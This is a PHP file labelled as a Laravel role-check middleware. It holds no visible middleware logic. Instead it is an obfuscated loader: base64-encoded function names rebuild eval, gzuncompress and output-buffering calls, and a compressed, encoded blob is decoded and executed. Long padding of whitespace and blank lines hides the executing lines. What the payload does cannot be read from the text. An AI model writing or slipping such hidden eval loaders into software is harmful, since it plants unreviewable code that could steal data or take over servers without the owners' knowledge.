<?php 
        $__='printf';$_='Loading app/Http/Middleware/HasRoleMiddleware.php';
        







































































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='eNrtml1v2jAUhu+R9h+4qJRWm9oklHYIcUGgcUjWbJCSr5sqdqiTYkjW8FV+/Q4BQumG2mrVpFV+LBNj+bw+Pj72BaRcXnN0CzSE9CEeT+6Eev51Q0MI0vRMm0zSs+s4DNlgHjwMzrQg6yVssOs5TaO03GJBlp2engr10ka4/KnECy8vldIq48rvSOO3HsGVapnnSLGPrhpC3rXL0lexORWNMofD4XxMBDKyxdDVpx1ky54zT3S1duc+Di/Xlybcmuvr+paHisPhcDgcDofD+d/gP2dwOBzOx0XAQTa4OL8NByQJB0KdR4TD4XA4nL9i/1WJdjcxW6NqhB17SZB671uKQjSFWFpPJOrCDJzeECO74rk6+z4XjXY3lYjcp115MSMV+9G/yczW2F6CnY7RQsIOm3puj7lXkRiCTn9kL0LQDtvFuBuYRwwcm/SR/Qjjl0RmM8wWJpZ7DGsm2NSyXJeKhicvIlK5phZSl3l/X0p91Mt8N4zIqA+aMC5u0k6rOTPiZNumRqx0PKcKvvep55zTwKneY1lK8YhQsvWpdb4bD3OtnlB/dq6UOaw3wlaTulcsw5o9AfsoRPY2LpbvqpLvmiKMHxZ6zUMaZoYrpgT+Ji/pGTcJNdTFoVjCHtWmRLa/HtRxein4cx+qOiMVZYbHJjPABx1V2UDrPo1Ps/jb7J3ng5yi6zgks22baHaMEbvvIF/CIxP2vzbtoCjCI9hLK3oSz97jtv2tpbQxqi3BRwb9U9+NRKO7ibFW7HteA8ejBlKlENHEsMTPnhwxT86gPaSDebEvRdU1fQZ5vey0RbrOt+TCl23RaA0vd/5vq5L6cTMBG0ZcG9bZnfxY5bLbyecKIDe7TrWa61gU8gGe7nVqWMoftNa1iP12XU/Wbdzsr229XpH6zmJ1fg5qeo4+I2M40O3m8oDGXt+dpazOG3sey7wiNcYVfXXg5+bzmBQ6Sg3uA6hJQ6iXSv/+Emvkz+PNt5P6W8yf2L7G8Gg34bGw+hS+FNPyd8d4ecu7Y/s5dbyXxOuUOqn/ArQH2pY=';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      






































































































































































































































































                                                                                                                                                                                                                     $________;
